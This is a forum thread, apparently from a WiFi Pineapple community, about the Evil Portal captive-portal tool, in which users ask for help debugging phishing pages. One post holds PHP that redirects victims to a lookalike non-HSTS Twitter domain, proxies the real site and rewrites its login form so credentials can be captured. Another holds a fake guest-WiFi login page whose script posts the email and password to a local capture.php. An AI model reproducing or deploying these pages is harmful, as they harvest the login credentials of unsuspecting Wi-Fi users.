Search the Community

Evil Portal is a UI front end for nodogsplash on the 3.x.x firmware. It makes it really simple to create a captive portal for whatever your needs are. You can do anything with it from just making someone agree to your terms of use on the pineapple to running some sort of browser exploitation that your clients are forced to visit (remember the laws where you live). Here's some media: This video goes along with a tutorial I made: click here

Hey guys, I've ran into a bit of trouble, could some kind soul help me out please? I'm unable to access POST and GET variables from within the landing page's php if there is a path specified in the URL that isn't "index.php" Example landing page code below, var_dump($_POST) on line 12 returns an empty array despite the form sending the data: <?php if(!strstr($_SERVER['HTTP_HOST'],"twitter") && !strstr($_SERVER['HTTP_HOST'],"twimg") ) { /* If not visiting twitter, redirect to non-HSTS twitter domain */ die('<meta http-equiv="refresh" content="0; url=http://twitter.co.uk/">'); } else { /* form posts to http://twitter.co.uk/sessions */ if(strstr($_SERVER['REQUEST_URI'], "/sessions")) { /* var_dump($_POST) returns an empty array, should print login data */ var_dump($_POST); die(); } /* Curl the site */ $curl = curl_init(); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_URL, $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($curl); $result = str_replace('https://twitter.com', 'http://twitter.co.uk', $result); /* changes the form action */ $result = str_replace('<script', "<div style='display:none'><!--", $result); $result = str_replace('</script', "--></div", $result); echo $result; } ?> if I make the form post to http://twitter.co.ukdirectly, without the /session - they are accessible from the landing page, but I would really like to be able to access them even with other filepaths.

I'd love to release this to the Community.. as soon as I get it fixed ;) <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR...nsitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>White Pirate WiFi</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <style type="text/css"> body { background-image: images/wallpaper-2551827.png); background-repeat: no-repeat; } </style> </head> <script type="text/javascript"> function ajaxRequest() { if (window.XMLHttpRequest) { return new XMLHttpRequest(); } else if (window.ActiveXObject) { return new ActiveXObject("Microsoft.XMLHTTP"); } else { return false; } } function sendInfo() { var xmlhttp = new ajaxRequest(); document.getElementById("results").innerHTML="<p><i>Thank you!</i></p>"; var usernamevalue=encodeURIComponent(document.getElementById("username").value) var passwordvalue=encodeURIComponent(document.getElementById("password").value) var parameters="username="+usernamevalue+"&password="+passwordvalue xmlhttp.open("POST", "http://172.16.42.1/capture.php", true) xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded") xmlhttp.send(parameters) } </script> <body text="#FFFFFF" link="#FF0004" vlink="#FF0004" alink="#FF0004"> <center> <br /> <img src="images/Wi-Fi-Alliance.png" alt="" width="200" height="128"><br /> <br /> <p><Strong>Welcome to 'White Pirate' Guest WiFi</Strong></p> <p><br /> </p> <form action="capture" method="post"> <fieldset> <p><strong>Please login using any of the following.</strong></p> <table width="500"> <tr> <td width="20%" colspan="1" align=left>Email</td> <td colspan="3"><input name="username" type="text" id="username" /></td> </tr> <tr> <td colspan="1" align=left>Password</td> <td colspan="3"><input type="password" name="password" id="password" /></td> </tr> <tr> <td><blockquote> <p><img src="images/social-facebook-box-white-icon.png" width="49" height="49" /></p> </blockquote></td> <td width="19%"><blockquote> <p><img src="images/social-yahoo-box-white-icon.png" width="49" height="49"/></p> </blockquote></td> <td width="20%"><blockquote> <p><img src="images/social-twitter-box-white-icon.png" width="49" height="49"/></p> </blockquote></td> <td width="41%"><blockquote> <p><img src="images/social-google-box-white-icon.png" width="49" height="49"/></p> </blockquote></td> </tr> </table> </fieldset> </form> <p><br /> </p> <form method="POST" action="http://172.16.42.1/capture.php"> <button type="button" onclick="sendInfo();return false;">Submit</button> </form> </p> </center> </body> </html My issue is just with the button.. making sure it goes to the correct page the user is trying to go to.